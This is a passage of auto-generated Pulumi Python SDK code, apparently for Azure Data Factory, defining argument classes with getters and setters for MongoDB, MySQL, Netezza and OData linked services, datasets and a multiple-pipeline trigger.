def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class MongoDbCollectionDatasetArgs:
def __init__(__self__, *,
collection_name: Any,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
The MongoDB database dataset.
:param Any collection_name: The collection name of the MongoDB database. Type: string (or Expression with resultType string).
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "collection_name", collection_name)
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'MongoDbCollection')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="collectionName")
def collection_name(self) -> Any:
"""
The collection name of the MongoDB database. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "collection_name")
@collection_name.setter
def collection_name(self, value: Any):
pulumi.set(self, "collection_name", value)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class MongoDbLinkedServiceArgs:
def __init__(__self__, *,
database_name: Any,
server: Any,
type: pulumi.Input[str],
allow_self_signed_server_cert: Optional[Any] = None,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
auth_source: Optional[Any] = None,
authentication_type: Optional[pulumi.Input[str]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
enable_ssl: Optional[Any] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
port: Optional[Any] = None,
username: Optional[Any] = None):
"""
Linked service for MongoDb data source.
:param Any database_name: The name of the MongoDB database that you want to access. Type: string (or Expression with resultType string).
:param Any server: The IP address or server name of the MongoDB server. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param Any allow_self_signed_server_cert: Specifies whether to allow self-signed certificates from the server. The default value is false. Type: boolean (or Expression with resultType boolean).
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param Any auth_source: Database against which the username and password are verified. Type: string (or Expression with resultType string).
:param pulumi.Input[str] authentication_type: The authentication type to be used to connect to the MongoDB database.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any enable_ssl: Specifies whether the connections to the server are encrypted using SSL. The default value is false. Type: boolean (or Expression with resultType boolean).
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: Password for authentication.
:param Any port: The TCP port number that the MongoDB server uses to listen for client connections. The default value is 27017. Type: integer (or Expression with resultType integer), minimum: 0.
:param Any username: Username for authentication. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "database_name", database_name)
pulumi.set(__self__, "server", server)
pulumi.set(__self__, "type", 'MongoDb')
if allow_self_signed_server_cert is not None:
pulumi.set(__self__, "allow_self_signed_server_cert", allow_self_signed_server_cert)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if auth_source is not None:
pulumi.set(__self__, "auth_source", auth_source)
if authentication_type is not None:
pulumi.set(__self__, "authentication_type", authentication_type)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if enable_ssl is not None:
pulumi.set(__self__, "enable_ssl", enable_ssl)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if port is not None:
pulumi.set(__self__, "port", port)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> Any:
"""
The name of the MongoDB database that you want to access. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "database_name")
@database_name.setter
def database_name(self, value: Any):
pulumi.set(self, "database_name", value)
@property
@pulumi.getter
def server(self) -> Any:
"""
The IP address or server name of the MongoDB server. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "server")
@server.setter
def server(self, value: Any):
pulumi.set(self, "server", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="allowSelfSignedServerCert")
def allow_self_signed_server_cert(self) -> Optional[Any]:
"""
Specifies whether to allow self-signed certificates from the server. The default value is false. Type: boolean (or Expression with resultType boolean).
"""
return pulumi.get(self, "allow_self_signed_server_cert")
@allow_self_signed_server_cert.setter
def allow_self_signed_server_cert(self, value: Optional[Any]):
pulumi.set(self, "allow_self_signed_server_cert", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="authSource")
def auth_source(self) -> Optional[Any]:
"""
Database against which the username and password are verified. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "auth_source")
@auth_source.setter
def auth_source(self, value: Optional[Any]):
pulumi.set(self, "auth_source", value)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> Optional[pulumi.Input[str]]:
"""
The authentication type to be used to connect to the MongoDB database.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="enableSsl")
def enable_ssl(self) -> Optional[Any]:
"""
Specifies whether the connections to the server are encrypted using SSL. The default value is false. Type: boolean (or Expression with resultType boolean).
"""
return pulumi.get(self, "enable_ssl")
@enable_ssl.setter
def enable_ssl(self, value: Optional[Any]):
pulumi.set(self, "enable_ssl", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
Password for authentication.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def port(self) -> Optional[Any]:
"""
The TCP port number that the MongoDB server uses to listen for client connections. The default value is 27017. Type: integer (or Expression with resultType integer), minimum: 0.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[Any]):
pulumi.set(self, "port", value)
@property
@pulumi.getter
def username(self) -> Optional[Any]:
"""
Username for authentication. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[Any]):
pulumi.set(self, "username", value)
@pulumi.input_type
class MultiplePipelineTriggerArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None,
pipelines: Optional[pulumi.Input[Sequence[pulumi.Input['TriggerPipelineReferenceArgs']]]] = None):
"""
Base class for all triggers that support a one-to-many model from trigger to pipelines.
:param pulumi.Input[str] type: Trigger type.
:param pulumi.Input[str] description: Trigger description.
:param pulumi.Input[Sequence[pulumi.Input['TriggerPipelineReferenceArgs']]] pipelines: Pipelines that need to be started.
"""
pulumi.set(__self__, "type", 'MultiplePipelineTrigger')
if description is not None:
pulumi.set(__self__, "description", description)
if pipelines is not None:
pulumi.set(__self__, "pipelines", pipelines)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Trigger type.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Trigger description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def pipelines(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TriggerPipelineReferenceArgs']]]]:
"""
Pipelines that need to be started.
"""
return pulumi.get(self, "pipelines")
@pipelines.setter
def pipelines(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TriggerPipelineReferenceArgs']]]]):
pulumi.set(self, "pipelines", value)
@pulumi.input_type
class MySqlLinkedServiceArgs:
def __init__(__self__, *,
connection_string: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
Linked service for MySQL data source.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] connection_string: The connection string.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "connection_string", connection_string)
pulumi.set(__self__, "type", 'MySql')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]:
"""
The connection string.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class NetezzaLinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
connection_string: Optional[Any] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
Netezza linked service.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param Any connection_string: An ODBC connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "type", 'Netezza')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if connection_string is not None:
pulumi.set(__self__, "connection_string", connection_string)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> Optional[Any]:
"""
An ODBC connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: Optional[Any]):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class NetezzaTableDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Netezza dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'NetezzaTable')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class ODataLinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
url: Any,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
authentication_type: Optional[pulumi.Input[str]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
user_name: Optional[Any] = None):
"""
Open Data Protocol (OData) linked service.
:param pulumi.Input[str] type: Type of linked service.
:param Any url: The URL of the OData service endpoint. Type: string (or Expression with resultType string).
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input[str] authentication_type: Type of authentication used to connect to the OData service.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: Password of the OData service.
:param Any user_name: User name of the OData service. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "type", 'OData')
pulumi.set(__self__, "url", url)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if authentication_type is not None:
pulumi.set(__self__, "authentication_type", authentication_type)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if user_name is not None:
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def url(self) -> Any:
"""
The URL of the OData service endpoint. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "url")
@url.setter
def url(self, value: Any):
pulumi.set(self, "url", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> Optional[pulumi.Input[str]]:
"""
Type of authentication used to connect to the OData service.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
Password of the OData service.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="userName")
def user_name(self) -> Optional[Any]:
"""
User name of the OData service. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "user_name")
@user_name.setter
def user_name(self, value: Optional[Any]):
pulumi.set(self, "user_name", value)
@pulumi.input_type
class ODataResourceDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
path: Optional[Any] = None,
structure: Optional[Any] = None):
"""
The Open Data Protocol (OData) resource dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any path: The OData resource path. Type: string (or Expression with resultType string).
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'ODataResource')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if path is not None:
